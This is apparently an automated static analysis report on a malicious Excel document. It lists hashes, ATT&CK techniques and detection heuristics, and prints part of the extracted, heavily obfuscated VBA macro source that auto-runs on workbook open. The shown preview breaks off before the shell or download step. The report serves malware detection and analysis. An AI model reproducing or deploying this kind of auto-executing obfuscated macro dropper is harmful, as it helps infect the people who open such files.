Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 94ff6d708820dda5…

MALICIOUS

Office (OLE)

375.5 KB Created: 2017-07-21 03:23:38 Authoring application: Microsoft Excel First seen: 2018-09-04
MD5: e9192442235929694c7b20a4b479cb3b SHA-1: 870dd5011c08db8a1bc4f67c0ffd7d01a277e229 SHA-256: 94ff6d708820dda59738401ea10eb1b0d7d98d104a998ba6cee70e728eb5f29f
228 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1203 Exploitation for Client Execution

The sample is an Excel document containing a Workbook_Open VBA macro that executes a shell command. The document body displays a fake 'Macro Error' message to lure the user into enabling macros. The VBA code is heavily obfuscated but the presence of Shell() calls and the Workbook_Open auto-execution indicate a malicious intent to download and execute a second-stage payload.

Heuristics 6

  • ClamAV: Xls.Malware.Valyria-10036513-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Valyria-10036513-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 88596 bytes
SHA-256: e361d773fbc4e9e44732e39975ed956ab4061ea77321547ca2fe6c655a3e2c71
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Public Sub WorKbOOK_oPen(): Call hCMvpTIkAOFLi: End Sub
Function hCMvpTIkAOFLi() As Integer
Call FOlBtvPFVMoZv
End Function
Function FOlBtvPFVMoZv()
Call aTDggaXNalZUl
End Function
Sub aTDggaXNalZUl()
Call kJTWGQHxQmEfE
End Sub
Function kJTWGQHxQmEfE()
Call IVrcKrNSkknuR
End Function
Static Sub IVrcKrNSkknuR()
Call TFzquHUVycZSh
End Sub
Private Sub TFzquHUVycZSh()
Call bMvFrzuhybhgj
End Sub
Private Function bMvFrzuhybhgj() As Long
Call VxjDJGyHTdkrq
End Function
Private Function VxjDJGyHTdkrq() As Boolean
Call BUudHzXGJGbhe
End Function
Private Sub BUudHzXGJGbhe()
Call sVOBwISIpGHuU
End Sub
Function sVOBwISIpGHuU() As Long
Call jWiZlRMKUGoHK
End Function
Sub jWiZlRMKUGoHK()
Call OTYFuMxkSWAAI
End Sub
Private Function OTYFuMxkSWAAI() As Boolean
Call oPQmbmMccWGNm
End Function
Static Sub oPQmbmMccWGNm()
Call PLISJLbVnXLZR
End Sub
Private Sub PLISJLbVnXLZR()
Call kchpfRxJtbkIY
End Sub
Static Function kchpfRxJtbkIY() As Double
Call IoGvjsDfNZTWk
End Function
Static Sub IoGvjsDfNZTWk()
Call SeVlJimODayiD
End Sub
Private Sub SeVlJimODayiD()
Call ziSribVAQPIwY
End Sub
Sub ziSribVAQPIwY()
Call HpOGeTwMQOQJZ
End Sub
Function HpOGeTwMQOQJZ() As Single
Call BaCFxazmlQTVh
End Function
Function BaCFxazmlQTVh() As String
Call GBVyOuJsRsEyq
End Function
Static Function GBVyOuJsRsEyq() As Byte
Call yCpWDCEuwslLf
End Function
Static Sub yCpWDCEuwslLf()
Call pDJusLzxbsSYV
End Sub
Sub pDJusLzxbsSYV()
Call vobUwfdBFJuDH
End Sub
Sub vobUwfdBFJuDH()
Call WkTAeEsuPKAPl
End Sub
Function WkTAeEsuPKAPl() As String
Call KBUxpQeYEHKeJ
End Function
Sub KBUxpQeYEHKeJ()
Call XLxGPdZBLMbzP
End Sub
Static Function XLxGPdZBLMbzP() As Variant
Call pCBjwlGPYDVlh
End Function
Private Sub pCBjwlGPYDVlh()
Call RrZoBHkCoWVVc
End Sub
Sub RrZoBHkCoWVVc()
Call ZxWDyzLOoVdid
End Sub
Sub ZxWDyzLOoVdid()
Call TjJCQFOoJXgul
End Sub
Function TjJCQFOoJXgul() As Double
Call apFQMypAJWoIm
End Function
Function apFQMypAJWoIm() As Single
Call iwCfJqQMJVwVn
End Function
Function iwCfJqQMJVwVn() As String
Call bipebwTmeXzhv
End Function
Sub bipebwTmeXzhv()
Call joltXpuyeWHuw
End Sub
Sub joltXpuyeWHuw()
Call rvhIUhVJeVPIx
End Sub
Sub rvhIUhVJeVPIx()
Call kgVGmoYjzYSTF
End Sub
Function kgVGmoYjzYSTF() As Date
Call snRVjgzvzXahG
End Function
Function snRVjgzvzXahG() As Variant
Call ztNkfYaHzVjvI
End Function
Function ztNkfYaHzVjvI() As Currency
Call tfBixfdhUYmGP
End Function
Private Sub tfBixfdhUYmGP()
Call BmxxuXEtUXuUR
End Sub
Static Sub BmxxuXEtUXuUR()
Call IstMqPfFUWCiS
End Sub
Static Function IstMqPfFUWCiS() As Currency
Call CehLJWifpYFtZ
End Function
Function CehLJWifpYFtZ() As Object
Call KkdZFOJrpXNHb
End Function
Function KkdZFOJrpXNHb() As String
Call RDgglhxipAJJt
End Function
Function RDgglhxipAJJt() As Byte
Call IEAEaqskUAqWj
End Function
Sub IEAEaqskUAqWj()
Call zFUcOznnAAXkY
End Sub
Function zFUcOznnAAXkY() As String
Call qHozDIipfADxO
End Function
Static Sub qHozDIipfADxO()
Call hIIXsRdsKAkKE
End Sub
Static Function hIIXsRdsKAkKE() As Object
Call YJcvhZYupzRXu
End Function
Sub YJcvhZYupzRXu()
Call QLxTWiTwUzykk
End Sub
Function QLxTWiTwUzykk() As Single
Call HMRqLrOzzzfxa
End Function
Sub HMRqLrOzzzfxa()
Call yNlOAAJBfzLKP
End Sub
Static Function yNlOAAJBfzLKP() As Currency
Call pPFmoJEDKysYF
End Function
Static Sub pPFmoJEDKysYF()
Call gQZKdSzGpyZlv
End Sub
Static Function gQZKdSzGpyZlv() A
... (truncated)